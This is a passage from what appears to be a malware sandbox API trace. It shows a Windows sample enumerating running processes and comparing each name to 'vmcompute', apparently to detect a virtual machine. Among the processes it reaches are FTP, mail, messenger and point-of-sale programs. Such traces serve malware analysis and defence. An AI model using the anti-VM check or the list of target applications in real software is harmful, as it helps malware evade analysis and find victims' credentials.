lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e1f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0102.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0102.156] StrStrIA (lpFirst="far.exe", lpSrch="vmcompute") returned 0x0 [0102.156] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0102.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.157] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570170 [0102.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3570170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0102.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0102.157] StrStrIA (lpFirst="filezilla.exe", lpSrch="vmcompute") returned 0x0 [0102.157] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0102.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.159] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fed0 [0102.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356fed0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.159] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0102.159] StrStrIA (lpFirst="flashfxp.exe", lpSrch="vmcompute") returned 0x0 [0102.159] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0102.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.160] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356fee8 [0102.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356fee8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0102.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0102.161] StrStrIA (lpFirst="fling.exe", lpSrch="vmcompute") returned 0x0 [0102.161] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0102.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.162] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f3a0 [0102.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357f3a0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0102.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0102.162] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="vmcompute") returned 0x0 [0102.162] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0102.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.163] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f740 [0102.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357f740, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0102.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0102.163] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="vmcompute") returned 0x0 [0102.163] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0102.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.165] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e1a8 [0102.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e1a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0102.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0102.165] StrStrIA (lpFirst="icq.exe", lpSrch="vmcompute") returned 0x0 [0102.165] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0102.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.166] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ff00 [0102.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356ff00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0102.166] StrStrIA (lpFirst="leechftp.exe", lpSrch="vmcompute") returned 0x0 [0102.166] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0102.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.167] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356feb8 [0102.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356feb8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.167] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0102.168] StrStrIA (lpFirst="ncftp.exe", lpSrch="vmcompute") returned 0x0 [0102.168] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0102.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.169] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570230 [0102.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3570230, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0102.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0102.169] StrStrIA (lpFirst="notepad.exe", lpSrch="vmcompute") returned 0x0 [0102.169] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0102.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.170] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35702f0 [0102.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35702f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0102.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0102.170] StrStrIA (lpFirst="operamail.exe", lpSrch="vmcompute") returned 0x0 [0102.170] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0102.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.171] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570290 [0102.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3570290, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0102.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0102.172] StrStrIA (lpFirst="pidgin.exe", lpSrch="vmcompute") returned 0x0 [0102.172] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0102.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.173] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570398 [0102.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570398, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0102.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0102.173] StrStrIA (lpFirst="scriptftp.exe", lpSrch="vmcompute") returned 0x0 [0102.173] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0102.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.174] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570488 [0102.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3570488, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0102.174] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0102.174] StrStrIA (lpFirst="skype.exe", lpSrch="vmcompute") returned 0x0 [0102.174] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0102.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.214] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35703b0 [0102.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35703b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0102.214] StrStrIA (lpFirst="smartftp.exe", lpSrch="vmcompute") returned 0x0 [0102.214] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0102.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.215] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570380 [0102.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3570380, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0102.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0102.215] StrStrIA (lpFirst="totalcmd.exe", lpSrch="vmcompute") returned 0x0 [0102.215] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0102.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.217] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35703c8 [0102.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35703c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0102.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0102.217] StrStrIA (lpFirst="trillian.exe", lpSrch="vmcompute") returned 0x0 [0102.217] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0102.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35701a0 [0102.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35701a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0102.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0102.218] StrStrIA (lpFirst="webdrive.exe", lpSrch="vmcompute") returned 0x0 [0102.218] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0102.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.220] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35703e0 [0102.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35703e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0102.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0102.220] StrStrIA (lpFirst="whatsapp.exe", lpSrch="vmcompute") returned 0x0 [0102.220] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0102.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.221] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35701b8 [0102.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35701b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0102.221] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0102.221] StrStrIA (lpFirst="winscp.exe", lpSrch="vmcompute") returned 0x0 [0102.221] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0102.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.223] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f540 [0102.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357f540, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0102.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0102.223] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="vmcompute") returned 0x0 [0102.223] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0102.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.224] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f780 [0102.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357f780, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0102.224] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0102.225] StrStrIA (lpFirst="active-charge.exe", lpSrch="vmcompute") returned 0x0 [0102.225] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0102.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.226] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570368 [0102.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3570368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0102.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0102.226] StrStrIA (lpFirst="accupos.exe", lpSrch="vmcompute") returned 0x0 [0102.226] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0102.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.227] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35701d0 [0102.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35701d0, 